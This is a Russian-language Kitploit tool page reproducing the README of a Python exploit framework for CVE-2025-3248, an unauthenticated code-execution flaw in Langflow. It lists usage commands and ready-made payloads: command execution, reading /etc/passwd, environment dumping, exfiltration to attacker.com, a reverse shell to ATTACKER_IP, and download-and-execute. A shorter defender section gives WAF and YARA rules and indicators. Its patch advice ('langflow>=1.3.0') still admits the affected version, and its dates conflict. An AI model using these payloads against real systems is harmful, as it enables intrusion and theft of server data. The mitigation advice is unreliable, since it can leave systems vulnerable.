Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
cve-2025-3248-exploit — Комплексный фреймворк для эксплуатации на Python для тестирования и демонстрации CVE-2025-3248, критической уязвимости удаленного выполнения кода без аутентификации в Langflow версии ≤ 1.3.0. | Kitploit
Инструменты/GitHubGitHub/drackyjr/cve-2025-3248-exploit
Сканеры уязвимостейАнализ КодаЭксплуатацияЭксплуатация веб-приложенийСбор информацииПост-эксплуатацияТестирование на ПроникновениеКомандование и УправлениеОбучение и Образование

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
Red Teaming
Разработка Полезной Нагрузки
GitHubdrackyjr/cve-2025-3248-exploit

cve-2025-3248-exploit

Комплексный фреймворк для эксплуатации на Python для тестирования и демонстрации CVE-2025-3248, критической уязвимости удаленного выполнения кода без аутентификации в Langflow версии ≤ 1.3.0.

Репозиторий
39 месяцев назадЕщё не проверено

CVE-2025-3248: Сканер уязвимости удаленного выполнения кода (RCE) без аутентификации в Langflow

License Python Status CVSS EPSS

Комплексный эксплойт-фреймворк на Python для тестирования и демонстрации CVE-2025-3248 — критической уязвимости удаленного выполнения кода без аутентификации в Langflow версий ≤ 1.3.0.


🔴 Обзор уязвимости

CVE-2025-3248: Внедрение кода в Langflow, приводящее к RCE

СвойствоЗначение
Идентификатор CVECVE-2025-3248
ПродуктLangflow
Затронутые версии≤ 1.3.0
Тип уязвимостиУдаленное выполнение кода без аутентификации (RCE)
Вектор атакиСеть
Требуется аутентификацияНет
Оценка CVSS9.8 (Critical)
Оценка EPSS92.57%
CWECWE-94 (Неправильный контроль генерации кода)
Уязвимая конечная точка/api/v1/validate/code

Коренная причина

Уязвимость существует в конечной точке API /api/v1/validate/code, которая принимает произвольный код Python и проверяет его с помощью небезопасной функции exec() без надлежащей санитизации ввода или изоляции. Уязвимость использует следующие особенности поведения Python:

  1. Декораторы выполняются немедленно при определении функции
  2. Значения аргументов по умолчанию выполняются во время разбора абстрактного синтаксического дерева (AST)
  3. Отсутствует проверка ввода, предотвращающая выполнение вредоносного кода

Цепочка атак

root@kitploit:~
Атакующий → POST /api/v1/validate/code → Python exec() → RCE
     ↓
   Аутентификация не требуется
     ↓
   Произвольный код Python
     ↓
   Выполнение системных команд

✨ Возможности

  • ✅ Обнаружение конечных точек: автоматически выявляет уязвимые экземпляры Langflow
  • ✅ Многоэтапное тестирование: 4 прогрессивных теста уязвимости
  • ✅ Выполнение команд: выполнение произвольных системных команд на цели
  • ✅ Извлечение окружения: получение переменных окружения и конфигурации
  • ✅ Файловые операции: тестирование возможности чтения/записи файлов
  • ✅ Поддержка обратной оболочки (reverse shell): создание интерактивных сессий обратной оболочки
  • ✅ Определение версии: получение информации о версии Langflow
  • ✅ Цветной вывод: улучшенная читаемость с помощью цветов терминала
  • ✅ Управление таймаутами: настраиваемые таймауты запросов
  • ✅ Обход SSL/TLS: поддержка самоподписанных сертификатов

📦 Требования

root@kitploit:~
Python >= 3.7
requests >= 2.25.0

Установка зависимостей

root@kitploit:~
pip install requests

Опционально (для улучшенного логирования)

root@kitploit:~
pip install colorama  # Для поддержки цветов в Windows

🚀 Установка

Способ 1: Клонирование из GitHub

root@kitploit:~
git clone https://github.com/drackyjr/cve-2025-3248-exploit.git
cd cve-2025-3248-exploit
pip install -r requirements.txt
chmod +x cve_2025_3248_test.py

📖 Использование

Базовый синтаксис

root@kitploit:~
python3 cve_2025_3248_test.py -t <target_url> [options]

Примеры быстрого старта

1. Базовое сканирование уязвимости

root@kitploit:~
python3 cve_2025_3248_test.py -t http://target.com

2. Выполнение пользовательской команды

root@kitploit:~
python3 cve_2025_3248_test.py -t http://target.com -c "whoami"

3. Выполнение нескольких команд

root@kitploit:~
python3 cve_2025_3248_test.py -t http://target.com -c "cat /etc/passwd"

4. Эксплуатация с обратной оболочкой (только авторизованное тестирование)

Шаг 1: Запустите слушатель netcat на вашей машине

root@kitploit:~
nc -lvnp 4444

Шаг 2: Запустите эксплойт

root@kitploit:~
python3 cve_2025_3248_test.py -t http://target.com --exploit --lhost YOUR_IP --lport 4444

Пример:

root@kitploit:~
python3 cve_2025_3248_test.py -t http://192.168.1.100:7860 --exploit --lhost 192.168.1.50 --lport 4444

5. Сканирование с пользовательским таймаутом

root@kitploit:~
python3 cve_2025_3248_test.py -t http://target.com --timeout 30

Аргументы командной строки

root@kitploit:~
positional arguments:
  None

optional arguments:
  -t, --target TARGET       Целевой URL (например, http://target.com) [ОБЯЗАТЕЛЬНО]
  -c, --command COMMAND     Команда для выполнения (по умолчанию: id)
  --timeout TIMEOUT         Таймаут запроса в секундах (по умолчанию: 10)
  --exploit                 Включить режим эксплуатации (обратная оболочка)
  --lhost LHOST             Ваш IP-адрес для обратной оболочки
  --lport LPORT             Ваш порт для обратной оболочки
  -h, --help                Показать это справочное сообщение

💾 Варианты полезной нагрузки (payload)

1. Выполнение через декоратор

root@kitploit:~
payload = {
    "code": """
@exec("import os; os.system('whoami')")
def vulnerable_function():
    pass
"""
}

2. Выполнение через аргумент по умолчанию

root@kitploit:~
payload = {
    "code": """
def test(arg=exec("__import__('subprocess').check_output(['id'])")):
    pass
"""
}

3. Экфильтрация данных

root@kitploit:~
payload = {
    "code": """
def test(x=exec("import requests; requests.post('http://attacker.com/exfil', data=open('/etc/passwd').read())")):
    pass
"""
}

4. Обратная оболочка (однострочник)

root@kitploit:~
payload = {
    "code": """
def shell(x=exec("import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('ATTACKER_IP',4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(['/bin/sh','-i'])")):
    pass
"""
}

5. Операции чтения файла

root@kitploit:~
payload = {
    "code": """
def read_file(x=exec("print(open('/etc/passwd').read())")):
    pass
"""
}

6. Перечисление переменных окружения

root@kitploit:~
payload = {
    "code": """
def enum_env(x=exec("import os; print('\\n'.join([f'{k}={v}' for k,v in os.environ.items()]))")):
    pass
"""
}

7. Загрузка и выполнение

root@kitploit:~
payload = {
    "code": """
def download_exec(x=exec("import urllib.request; exec(urllib.request.urlopen('http://attacker.com/payload.py').read())")):
    pass
"""
}

🔍 Обнаружение и смягчение

Для защитников

Немедленные действия

  1. Обновить Langflow

    root@kitploit:~
    pip install langflow>=1.3.0
    # или
    docker pull langflow:latest
    
  2. Ограничить сетевой доступ

    root@kitploit:~
    # Обратный прокси Nginx — блокировать уязвимую конечную точку
    location /api/v1/validate/code {
        deny all;
    }
    
  3. Внедрить аутентификацию

    root@kitploit:~
    # Добавить middleware аутентификации
    @app.middleware("http")
    async def auth_middleware(request, call_next):
        if "/api/v1/validate/code" in request.url.path:
            if not verify_auth(request):
                return JSONResponse(status_code=401)
        return await call_next(request)
    

Правила WAF

Правило ModSecurity:

root@kitploit:~
SecRule ARGS:code "@contains exec" "id:1001,phase:2,deny"
SecRule ARGS:code "@contains subprocess" "id:1002,phase:2,deny"
SecRule ARGS:code "@contains __import__" "id:1003,phase:2,deny"
SecRule ARGS:code "@contains os.system" "id:1004,phase:2,deny"

Правила обнаружения

Сигнатура YARA:

root@kitploit:~
rule CVE_2025_3248_Langflow_RCE {
    strings:
        $api_path = "/api/v1/validate/code"
        $exec = "exec("
        $subprocess = "subprocess"
        $os_system = "os.system"
    condition:
        $api_path and any of ($exec, $subprocess, $os_system)
}

Мониторинг и логирование

root@kitploit:~
# Мониторинг подозрительных запросов
tail -f /var/log/nginx/access.log | grep "/api/v1/validate/code"

# Оповещение о POST-запросах к уязвимой конечной точке
auditctl -w /var/lib/langflow -p wa -k langflow_changes

Индикаторы компрометации (IoC)

  • Необычные POST-запросы к /api/v1/validate/code
  • Запущенные процессы Langflow с подозрительными именами
  • Неожиданные исходящие соединения с сервера Langflow
  • Файлы, созданные с необычными временными метками в /tmp
  • Выполнение подпроцессов Python из процесса Langflow
  • Ошибки аутентификации, за которыми следуют запросы к API
  • Всплеск использования ЦП/памяти в контейнере Langflow

🔬 Технический анализ

Как работает уязвимость

Цепочка уязвимости работает следующим образом:

root@kitploit:~
# Атакующий отправляет эту полезную нагрузку:
POST /api/v1/validate/code HTTP/1.1
Content-Type: application/json

{
    "code": "def func(x=exec('import os; os.system(\"whoami\")')): pass"
}

# Сервер обрабатывает её:
exec(code)  # ← Опасно! Нет санитизации

# Во время разбора AST вычисляется аргумент по умолчанию:
# exec('import os; os.system("whoami")')

# Результат: произвольное выполнение команд

Почему декораторы работают

Поведение Python с декораторами при определении функции:

root@kitploit:~
# Этот код выполняется немедленно:
@decorator_expression
def my_function():
    pass

# Таким образом, эта полезная нагрузка выполняет код:
@exec("malicious_code_here")
def vulnerable_function():
    pass

Почему это критично

  1. Не требуется аутентификация: любой может получить доступ к конечной точке
  2. Доступ по сети: может быть использована удалённо
  3. Полный доступ к системе: выполняется с привилегиями процесса Langflow
  4. Отсутствует проверка ввода: прямое выполнение кода
  5. Широко распространена: используется в производственных средах
  6. Высокая доступность эксплойта: опубликованы публичные PoC

📊 Хронология уязвимости


🛡️ Контрольный список защитного тестирования

При проведении авторизованного тестирования безопасности:

  • Получить письменное разрешение перед тестированием
  • Документировать все тестовые действия
  • По возможности использовать изолированные тестовые среды
  • Избегать эксплуатации производственных систем без необходимости
  • Удалять артефакты (файлы, процессы), созданные в ходе тестирования
  • Ответственно сообщать об обнаружениях целевой организации
  • Следовать практике ответственного раскрытия информации
  • Сохранять конфиденциальность результатов тестирования

📚 Ссылки

  • OffSec Blog: CVE-2025-3248 Analysis
  • SentinelOne: Langflow Code Injection RCE
  • Zscaler ThreatLabz: CVE-2025-3248 RCE Vulnerability
  • TrendMicro: FLODRIC Botnet Exploitation
  • RecordedFuture: Active Exploitation Report
  • Exploit-DB: Langflow 1.3.0 RCE
  • GitHub Advisories: GHSA-c995-4fw3-j39m

🤝 Вклад

Приветствуются вклады! Пожалуйста, соблюдайте следующие рекомендации:

  1. Сделайте форк репозитория
  2. Создайте ветку для функции (git checkout -b feature/amazing-feature)
  3. Зафиксируйте изменения (git commit -m 'Add amazing feature')
  4. Отправьте изменения в ветку (git push origin feature/amazing-feature)
  5. Откройте Pull Request

Идеи для вклада

  • Дополнительные вариации полезных нагрузок
  • Альтернативные методы эксплуатации
  • Методы обхода обнаружения
  • Стратегии смягчения
  • Улучшения документации
  • Исправления ошибок

⚠️ Отказ от ответственности

ВАЖНОЕ ЮРИДИЧЕСКОЕ УВЕДОМЛЕНИЕ:

Этот инструмент предоставляется только для образовательных целей и авторизованного тестирования безопасности. Несанкционированный доступ к компьютерным системам НЕЗАКОНЕН и нарушает законы, включая:

  • Computer Fraud and Abuse Act (CFAA) — США
  • Computer Misuse Act — Великобритания
  • Information Technology Act (ITA) — Индия
  • Аналогичные законы в вашей юрисдикции

Вы несёте единоличную ответственность за:

  • ✅ Получение явного письменного разрешения от владельцев систем перед тестированием
  • ✅ Обеспечение соответствия всех действий местным и международным законам
  • ✅ Использование этого инструмента только на системах, которые вам принадлежат или на тестирование которых у вас есть разрешение
  • ✅ Сохранение конфиденциальности результатов проверки безопасности
  • ✅ Соблюдение практик ответственного раскрытия информации
  • ✅ Невозможность использования этого инструмента в злонамеренных целях

Используя этот инструмент, вы соглашаетесь:

  • Не использовать его для несанкционированного доступа или нанесения ущерба
  • Принять полную юридическую ответственность за свои действия
  • Освобождать создателей от любой ответственности
  • Соблюдать все применимые законы и нормативные акты

Создатели и участники НЕ НЕСУТ ОТВЕТСТВЕННОСТИ за неправомерное использование этого инструмента.


📖 Дополнительные ресурсы

Учебные материалы

  • OWASP Code Injection
  • CWE-94: Improper Control of Generation of Code
  • Python Security: exec() Dangers
  • Reverse Shell Techniques

Последнее обновление: 21 ноября 2025 г.


root@kitploit:~
╔═══════════════════════════════════════════════════════════╗
║  CVE-2025-3248: Langflow RCE Vulnerability Scanner v1.0  ║
║  Use Responsibly - Authorized Testing Only               ║
╚═══════════════════════════════════════════════════════════╝
Скачать инструмент
ДатаСобытие
2025-04-06Уязвимость обнаружена и сообщена команде Langflow
2025-04-17Выпущен публичный эксплойт (Exploit-DB)
2025-05-14FortiguardLabs выпустила предупреждение об эпидемии (Outbreak Alert)
2025-05-21Опубликован анализ Zscaler ThreatLabz
2025-05-22RecordedFuture сообщает об активной эксплуатации
2025-06-16TrendMicro сообщает об эксплуатации ботнетом FLODRIC
2025-06-17Опубликован всесторонний анализ OffSec
2025-11-05Запись в базе данных уязвимостей SentinelOne
2025-11-20Наблюдаются продолжающиеся попытки эксплуатации